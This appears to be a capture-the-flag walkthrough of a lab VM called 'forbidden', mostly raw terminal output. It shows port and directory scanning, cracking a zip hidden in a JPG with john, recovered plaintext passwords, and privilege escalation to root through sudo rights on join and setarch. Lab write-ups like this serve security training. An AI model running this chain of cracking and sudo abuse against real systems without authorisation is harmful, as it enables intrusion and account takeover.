┌──(root㉿kali)-[~/Desktop/tmp/forbidden]
└─# nmap 192.168.31.224 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 00:18 EDT
Nmap scan report for 192.168.31.224
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
MAC Address: 08:00:27:C3:73:5D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.14 seconds

SECURE WEB/FTP  安全 WEB/FTP
Hi, Im the best admin of the world. You cannot execute .php code on this server so you cannot obtain a reverse shell. Not sure if its misconfigured another things... but the importart is that php is disabled. -marta
嗨，我是世界上最好的管理员。您无法在此服务器上执行.php 代码，因此无法获取反向 shell。不确定是不是配置错了其他东西......但关键是 PHP 被禁用了。-玛尔塔

┌──(root㉿kali)-[~/Desktop/tmp/forbidden]
└─# gobuster dir -u "http://192.168.31.224/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-m
edium.txt -x .txt,.php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.224/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 241]
/robots.txt           (Status: 200) [Size: 10]
/note.txt             (Status: 200) [Size: 75]

The extra-secured .jpg file contains my password but nobody can obtain it.

额外安全的 .jpg 文件包含我的密码，但没有人可以获取它。

ftp> ls
229 Entering Extended Passive Mode (|||27129|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Oct 09  2020 www
226 Directory send OK.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# zip2john TOPSECRETIMAGE.jpg.out>pas
ver 2.0 efh 5455 efh 7875 TOPSECRETIMAGE.jpg.out/pass.txt PKZIP Encr: TS_chk, cmplen=66, decmplen=71, crc=E22A2397 ts=9831 cs=9831 type=8

┌──(root㉿kali)-[~/Desktop/tmp]
└─# john pas -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secret           (TOPSECRETIMAGE.jpg.out/pass.txt)
1g 0:00:00:00 DONE (2025-06-12 01:45) 100.0g/s 819200p/s 819200c/s 819200C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat pass.txt
- .... .
.--. .- ... ... .-- --- .-. -..
.. ... ---...
#莫斯密码解密：THEPASSWOR6S:

vGffXfDreF453!

markos:x:1001:1001:,,,:/home/markos:/bin/bash
peter:x:1002:1002:,,,:/home/peter:/bin/bash
marta:x:1000:1000:marta,,,:/home/marta:/bin/bash

marta@forbidden:~$ sudo -l
Matching Defaults entries for marta on forbidden:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User marta may run the following commands on forbidden:
    (ALL : ALL) NOPASSWD: /usr/bin/join

boomer           (peter)

peter@forbidden:/home/marta$ sudo -l
Matching Defaults entries for peter on forbidden:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on forbidden:
    (ALL : ALL) NOPASSWD: /usr/bin/setarc

peter@forbidden:/home/marta$ uname -m
x86_64
peter@forbidden:/home/marta$ sudo setarch x86_64 /bin/bash
root@forbidden:/home/marta#